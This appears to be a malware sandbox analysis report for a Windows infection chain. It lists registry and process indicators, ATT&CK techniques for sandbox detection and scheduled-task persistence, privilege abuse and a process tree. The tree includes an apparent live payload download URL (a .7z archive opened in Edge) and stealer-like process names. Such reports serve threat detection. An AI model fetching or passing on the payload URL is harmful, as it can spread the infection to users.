Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9d0Y7MxBU5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gpupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	newalp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GOLD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorti.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	stealc_default.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	stealc_default.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket	XBchmPW.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	XBchmPW.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	XBchmPW.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{f930bed6-0000-0000-0000-d01200000000}	XBchmPW.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings	OpenWith.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3412	schtasks.exe
6064	schtasks.exe
6536	schtasks.exe
6396	schtasks.exe
6684	schtasks.exe
2392	schtasks.exe
2288	schtasks.exe
448	schtasks.exe
1584	schtasks.exe
3180	schtasks.exe
4312	schtasks.exe
6760	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1420	msedge.exe
1420	msedge.exe
4828	msedge.exe
4828	msedge.exe
2072	identity_helper.exe
2072	identity_helper.exe
1652	msedge.exe
1652	msedge.exe
1408	Foot.pif
1408	Foot.pif
1408	Foot.pif
1408	Foot.pif
1408	Foot.pif
1408	Foot.pif
1408	Foot.pif
1408	Foot.pif
1408	Foot.pif
1408	Foot.pif
4460	Foot.pif
4460	Foot.pif
4460	Foot.pif
4460	Foot.pif
4460	Foot.pif
4460	Foot.pif
4460	Foot.pif
4460	Foot.pif
4460	Foot.pif
4460	Foot.pif
1960	Foot.pif
1960	Foot.pif
1960	Foot.pif
1960	Foot.pif
1960	Foot.pif
1960	Foot.pif
3136	Foot.pif
3136	Foot.pif
3136	Foot.pif
3136	Foot.pif
3136	Foot.pif
3136	Foot.pif
4824	JYqzDWcCifBR2B3OjSuXyEcL.exe
4824	JYqzDWcCifBR2B3OjSuXyEcL.exe
3996	5cL0hbP2BlOOlA3K24bN_Kgl.exe
3996	5cL0hbP2BlOOlA3K24bN_Kgl.exe
3780	w74QkkuBF85hmDyo3WP13d2g.exe
3780	w74QkkuBF85hmDyo3WP13d2g.exe
2640	shYdB1lAKdOjVl1A3sVBsMCM.tmp
2640	shYdB1lAKdOjVl1A3sVBsMCM.tmp
4656	axplong.exe
4656	axplong.exe
1808	explorti.exe
1808	explorti.exe
3136	Foot.pif
3136	Foot.pif
3136	Foot.pif
3136	Foot.pif
1960	Foot.pif
1960	Foot.pif
1960	Foot.pif
1960	Foot.pif
424	powershell.exe
424	powershell.exe
4204	powershell.exe
4204	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2100	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4812	7zG.exe
Token: 35	4812	7zG.exe
Token: SeSecurityPrivilege	4812	7zG.exe
Token: SeSecurityPrivilege	4812	7zG.exe
Token: SeRestorePrivilege	4200	7zG.exe
Token: 35	4200	7zG.exe
Token: SeSecurityPrivilege	4200	7zG.exe
Token: SeSecurityPrivilege	4200	7zG.exe
Token: SeDebugPrivilege	4184	tasklist.exe
Token: SeDebugPrivilege	1972	tasklist.exe
Token: SeDebugPrivilege	4920	tasklist.exe
Token: SeDebugPrivilege	3104	tasklist.exe
Token: SeDebugPrivilege	1888	tasklist.exe
Token: SeDebugPrivilege	636	tasklist.exe
Token: SeDebugPrivilege	4088	tasklist.exe
Token: SeDebugPrivilege	3764	tasklist.exe
Token: SeDebugPrivilege	4960	3NcWoIwM1AbzK3IQPHPOLtww.exe
Token: SeDebugPrivilege	424	powershell.exe
Token: SeDebugPrivilege	4204	powershell.exe
Token: SeIncreaseQuotaPrivilege	2248	WMIC.exe
Token: SeSecurityPrivilege	2248	WMIC.exe
Token: SeTakeOwnershipPrivilege	2248	WMIC.exe
Token: SeLoadDriverPrivilege	2248	WMIC.exe
Token: SeSystemProfilePrivilege	2248	WMIC.exe
Token: SeSystemtimePrivilege	2248	WMIC.exe
Token: SeProfSingleProcessPrivilege	2248	WMIC.exe
Token: SeIncBasePriorityPrivilege	2248	WMIC.exe
Token: SeCreatePagefilePrivilege	2248	WMIC.exe
Token: SeBackupPrivilege	2248	WMIC.exe
Token: SeRestorePrivilege	2248	WMIC.exe
Token: SeShutdownPrivilege	2248	WMIC.exe
Token: SeDebugPrivilege	2248	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2248	WMIC.exe
Token: SeRemoteShutdownPrivilege	2248	WMIC.exe
Token: SeUndockPrivilege	2248	WMIC.exe
Token: SeManageVolumePrivilege	2248	WMIC.exe
Token: 33	2248	WMIC.exe
Token: 34	2248	WMIC.exe
Token: 35	2248	WMIC.exe
Token: 36	2248	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2248	WMIC.exe
Token: SeSecurityPrivilege	2248	WMIC.exe
Token: SeTakeOwnershipPrivilege	2248	WMIC.exe
Token: SeLoadDriverPrivilege	2248	WMIC.exe
Token: SeSystemProfilePrivilege	2248	WMIC.exe
Token: SeSystemtimePrivilege	2248	WMIC.exe
Token: SeProfSingleProcessPrivilege	2248	WMIC.exe
Token: SeIncBasePriorityPrivilege	2248	WMIC.exe
Token: SeCreatePagefilePrivilege	2248	WMIC.exe
Token: SeBackupPrivilege	2248	WMIC.exe
Token: SeRestorePrivilege	2248	WMIC.exe
Token: SeShutdownPrivilege	2248	WMIC.exe
Token: SeDebugPrivilege	2248	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2248	WMIC.exe
Token: SeRemoteShutdownPrivilege	2248	WMIC.exe
Token: SeUndockPrivilege	2248	WMIC.exe
Token: SeManageVolumePrivilege	2248	WMIC.exe
Token: 33	2248	WMIC.exe
Token: 34	2248	WMIC.exe
Token: 35	2248	WMIC.exe
Token: 36	2248	WMIC.exe
Token: SeDebugPrivilege	4540	LS6xXLfIqH.exe
Token: SeBackupPrivilege	4540	LS6xXLfIqH.exe
Token: SeSecurityPrivilege	4540	LS6xXLfIqH.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4812	7zG.exe
4200	7zG.exe
1408	Foot.pif
1408	Foot.pif
1408	Foot.pif
4460	Foot.pif
4460	Foot.pif
4460	Foot.pif
1960	Foot.pif
1960	Foot.pif
1960	Foot.pif
3136	Foot.pif
3136	Foot.pif
3136	Foot.pif
2640	shYdB1lAKdOjVl1A3sVBsMCM.tmp
3780	w74QkkuBF85hmDyo3WP13d2g.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
4828	msedge.exe
1408	Foot.pif
1408	Foot.pif
1408	Foot.pif
4460	Foot.pif
4460	Foot.pif
4460	Foot.pif
1960	Foot.pif
1960	Foot.pif
1960	Foot.pif
3136	Foot.pif
3136	Foot.pif
3136	Foot.pif
4192	691f3ea1e1.exe
4192	691f3ea1e1.exe
4192	691f3ea1e1.exe
4192	691f3ea1e1.exe
4192	691f3ea1e1.exe
4192	691f3ea1e1.exe
4192	691f3ea1e1.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
4192	691f3ea1e1.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2100	OpenWith.exe
4192	691f3ea1e1.exe
3156	firefox.exe
4332	752612fd8e.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4828 wrote to memory of 4392	4828	msedge.exe	83
PID 4828 wrote to memory of 4392	4828	msedge.exe	83
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 2316	4828	msedge.exe	84
PID 4828 wrote to memory of 1420	4828	msedge.exe	85
PID 4828 wrote to memory of 1420	4828	msedge.exe	85
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86
PID 4828 wrote to memory of 1660	4828	msedge.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://tirrex.cl/server/arch0408_0224.7z
  2⤵
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4828
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe661546f8,0x7ffe66154708,0x7ffe66154718
    3⤵
    PID:4392
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
